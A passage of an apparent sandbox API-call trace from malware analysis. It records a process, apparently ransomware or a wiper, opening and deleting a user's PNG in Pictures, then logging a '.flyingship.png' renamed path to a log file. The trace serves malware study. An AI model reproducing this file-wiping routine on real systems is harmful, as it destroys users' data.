wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.005] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.005] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0191.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0191.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.005] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ac7960, ftCreationTime.dwHighDateTime=0x1d5e3d1, ftLastAccessTime.dwLowDateTime=0x6fbebf20, ftLastAccessTime.dwHighDateTime=0x1d5dac2, ftLastWriteTime.dwLowDateTime=0x6fbebf20, ftLastWriteTime.dwHighDateTime=0x1d5dac2, nFileSizeHigh=0x0, nFileSizeLow=0x3ead, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ufXfgc_LQhg.png", cAlternateFileName="UFXFGC~1.PNG")) returned 0x90ae18 [0191.006] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0191.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.006] CharLowerBuffW (in: lpsz="byte[16045]", cchLength=0xb | out: lpsz="byte[16045]") returned 0xb [0191.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.006] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0191.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.007] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.007] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0191.007] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0191.007] FreeLibrary (hLibModule=0x75c90000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0191.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.008] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.008] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.009] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0191.009] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\ufxfgc_lqhg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0191.010] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.010] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.010] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0191.010] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.010] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.010] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.010] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.010] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.010] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.010] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.011] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0191.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.011] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.011] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.011] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.011] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", lpFilePart=0x0) returned 0x47 [0191.011] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ac7960, ftCreationTime.dwHighDateTime=0x1d5e3d1, ftLastAccessTime.dwLowDateTime=0x6fbebf20, ftLastAccessTime.dwHighDateTime=0x1d5dac2, ftLastWriteTime.dwLowDateTime=0x1710b620, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x3ead, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ufXfgc_LQhg.png", cAlternateFileName="UFXFGC~1.PNG")) returned 0x90ae18 [0191.011] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\ufxfgc_lqhg.png")) returned 1 [0191.013] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ac7960, ftCreationTime.dwHighDateTime=0x1d5e3d1, ftLastAccessTime.dwLowDateTime=0x6fbebf20, ftLastAccessTime.dwHighDateTime=0x1d5dac2, ftLastWriteTime.dwLowDateTime=0x1710b620, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x3ead, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ufXfgc_LQhg.png", cAlternateFileName="UFXFGC~1.PNG")) returned 0 [0191.013] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.014] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.014] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0191.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.015] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.015] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.015] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.015] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.016] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.016] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.016] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.017] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.017] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0191.017] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.017] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.017] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0191.017] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x30fc, lpOverlapped=0x0) returned 1 [0191.018] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0191.018] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x30fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.018] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0191.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.flyingship.png\r\n", cchWideChar=85, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0191.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x55) returned 0x8c4a48 [0191.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.flyingship.png\r\n", cchWideChar=85, lpMultiByteStr=0x8c4a48, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 85 [0191.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0191.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0191.018] WriteFile (in: hFile=0x160, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x54, lpOverlapped=0x0) returned 1 [0191.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0191.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.018] CloseHandle (hObject=0x160) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: 